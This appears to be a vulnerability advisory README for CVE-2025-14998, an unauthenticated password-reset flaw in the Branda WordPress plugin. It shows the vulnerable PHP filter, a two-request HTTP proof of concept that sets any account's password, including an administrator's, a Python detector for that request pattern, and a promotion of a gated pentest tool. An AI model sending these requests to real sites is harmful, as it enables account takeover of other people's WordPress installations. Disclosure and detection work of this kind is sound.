KTN1990/CVE-2025-14998
CVE-2025-14998 WordPress Plugin - Branda - White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover
CVE-2025-14998: The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary users' passwords, including administrators', and leverage that to gain access to their accounts.
For more WordPress vulnerabilities and exclusive pentest tools contact me on Telegram @KtN1990.
Root Cause Analysis
The plugin overrides WordPress's password generation logic by hooking into the random_password filter. Instead of allowing WordPress to generate a secure random password, the plugin replaces it with user-controlled input: the password_1 POST parameter when present, otherwise the password stored in the signup record matched by the key request parameter. The filter runs inside wp_generate_password(), which the lost-password flow also uses to create the reset key, so a request-supplied password_1 value is returned both as the reset key and as the new password, with no check that the caller owns the account.
Vulnerable Code
```php
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    // The key is read straight from the request, GET or POST, without validation.
    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    // Flaw: any request carrying password_1 replaces the password WordPress
    // just generated, with no check of who is making the request.
    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        // Otherwise fall back to the password stored with a pending signup.
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );
        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );
            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }
    return $password;
}
```
Proof of Concept (Sanitized)
Step 1 - Trigger Password Reset with Arbitrary Password
```http
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&redirect_to=&password_1=EfUSmvnTun5XbvE6RvIB&wp-submit=Get+New+Password
```
The value of password_1 can be any attacker-controlled string.
Step 2 - Complete Reset Using the Same Value as the Reset Key
```http
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
```
Result
- WordPress accepts the attacker-controlled password
- The administrator password is changed
- The attacker can authenticate as the affected user
No email access or valid password reset token is required.
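A detection check for the two-request pattern above, written here as an added example (it is not code from the plugin or from the advisory author). The request shapes and field names come from the PoC; the assumption that the stock WordPress lost-password form never submits a password_1 field is mine, and the sample traffic is constructed.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    """Minimal request record as a WAF or reverse-proxy log might supply it."""
    method: str
    url: str
    body: str = ""


def _params(req):
    parts = urlsplit(req.url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    body = {k: v[0] for k, v in parse_qs(req.body).items()} if req.body else {}
    return parts.path, query, body


def detect_branda_reset_abuse(requests):
    """Return one alert string per suspicious wp-login.php request.

    Signal 1: a lostpassword POST carrying password_1. The stock WordPress
              form sends only user_login/redirect_to/wp-submit (assumption).
    Signal 2: an action=rp request whose key equals a password_1 value seen
              earlier, i.e. the reset is completed with the attacker's value
              instead of the emailed token.
    """
    seen = {}  # password_1 value -> user_login it was submitted for
    alerts = []
    for req in requests:
        path, q, body = _params(req)
        if not path.endswith("/wp-login.php"):
            continue
        if req.method == "POST" and q.get("action") == "lostpassword" and body.get("password_1"):
            user = body.get("user_login", "?")
            seen[body["password_1"]] = user
            alerts.append(f"password_1 supplied to lostpassword for user '{user}'")
        elif q.get("action") == "rp" and q.get("key") in seen:
            alerts.append(f"reset key for '{q.get('login')}' matches password_1 submitted for '{seen[q['key']]}'")
    return alerts


# Constructed sample traffic modelled on the PoC; the third request is benign.
SAMPLE = [
    Request("POST", "/wp/wp-login.php?action=lostpassword",
            "user_login=admin&redirect_to=&password_1=EfUSmvnTun5XbvE6RvIB&wp-submit=Get+New+Password"),
    Request("GET", "/wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp"),
    Request("POST", "/wp/wp-login.php?action=lostpassword", "user_login=editor&wp-submit=Get+New+Password"),
]

if __name__ == "__main__":
    for alert in detect_branda_reset_abuse(SAMPLE):
        print("ALERT:", alert)
```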
Impact
An unauthenticated attacker can:
- Reset passwords for any WordPress user
- Take over administrator accounts
- Gain full control of the WordPress installation
- Modify plugins, themes, or content
Contact
More vulnerabilities: check Megatron!
- What is Megatron? Megatron is an advanced penetration testing tool designed for serious testers and red teamers. Whether you're auditing, scanning, or testing infrastructures, Megatron gives you the power you need.
- Ideal for:
  - Security researchers
  - Penetration testers
  - Ethical hackers
- Maintained line with ~230 legacy research modules; recent scanner core improvements for stability and detection.
- Purpose: Provided strictly for authorized security testing, education, defensive research, and red-team training. This release is not for unlawful use. Distribution is gated: access only after verification and a signed Responsible Use Agreement / NDA.
- Responsible access policy (summary):
  - Access only to verified security professionals, corporate security teams, accredited labs, or training providers.
  - You must provide org name, role, official email (corporate), and lawful purpose.
  - Full download granted only after verification and signing our Responsible Use Agreement / NDA.
  - Zero tolerance for misuse: evidence of malicious use results in revocation and reporting where required.
- Contact / Requests / Verification: @KTN1990 (include organization, role, and a short reason for access). Telegram Channel